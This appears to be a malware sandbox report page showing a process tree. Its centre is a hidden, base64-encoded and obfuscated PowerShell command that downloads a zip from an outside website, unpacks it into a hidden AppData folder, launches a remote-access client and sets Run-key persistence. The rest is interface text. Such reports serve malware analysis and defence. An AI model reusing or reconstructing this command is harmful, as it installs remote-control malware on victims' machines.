| ZeroBOX

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\loc.ps1
940
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjAGUAOwAgACQAewBGAG8AYABsAEQAfQAuACIAYQB0AFQAYABSAEkAYgB1AGAAVABgAGUAcwAiAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAnAEgAaQBkAGQAZQAnACkAOwAgAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFIAZQBtAG8AJwAsACcAdgAnACwAJwBlAC0ASQB0AGUAbQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAcABhAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgB0ACcALAAnAHMAdABhACcAKQAgACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdAAzACcALAAnAHgAZQAnACwAJwAyAC4AZQAnACwAJwBjAGwAaQBlAG4AJwApADsAIAAkAHsAZgBTAGAAVABSAH0APQAkAHsAcABgAFoAaQBQAH0AKwAoACgAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAMwAyAC4AZQB4AGUAJwAsACcAaQBlAG4AdAAnACwAJwBOAGMAbAAnACwAJwBUADcAJwApACkAIAAgAC0AQwBSAGUAUABMAEEAYwBlACAAKABbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADUAKwBbAGMAaABBAHIAXQA3ADgAKQAsAFsAYwBoAEEAcgBdADkAMgApADsAIAAkAHsAcgBgAE4AbQB9AD0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9ACIAIAAtAGYAIAAnAE4ARQBOACcALAAnAEUAdQBwAGQAYQB0AGUAJwAsACcAMABUACcALAAnAE8AJwAsACcAXwAnACkAKwAkAHsAcgBgAFIATgBgAFUAbQB9ADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQBtACcALAAnAFAAcgBvACcALAAnAHIAdAB5ACcALAAnAGUAJwAsACcAcAAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQB9AHsAOQB9AHsAOAB9AHsANgB9AHsAMwB9AHsAMQAwAH0AewAwAH0AewA3AH0AewA0AH0AewAyAH0AewA1AH0AIgAtAGYAIAAnAHoAVwAnACwAJwBIACcALAAnAG4AUABjACcALAAnAEYAVABXAEEAUgBFAFAAYwB6AE0AaQBjAHIAbwBzACcALAAnAHIAcgBlAG4AdABWAGUAcgBzAGkAbwAnACwAJwB6AFIAdQBuACcALAAnAFMATwAnACwAJwBpAG4AZABvAHcAcwBQAGMAegBDAHUAJwAsACcAUABjAHoAJwAsACcASwBDAFUAOgAnACwAJwBvAGYAdABQAGMAJwApACkALgAiAHIARQBwAEwAYABBAGMARQAiACgAKABbAEMAaABBAFIAXQA4ADAAKwBbAEMAaABBAFIAXQA5ADkAKwBbAEMAaABBAFIAXQAxADIAMgApACwAWwBzAFQAUgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAIAAtAE4AYQBtAGUAIAAkAHsAUgBgAE4AbQB9ACAALQBWAGEAbAB1AGUAIAAkAHsAZgBTAGAAVABSAH0AIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAnAG4AJwAsACcAUwB0AHIAaQAnACkAOwA=
  2188

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents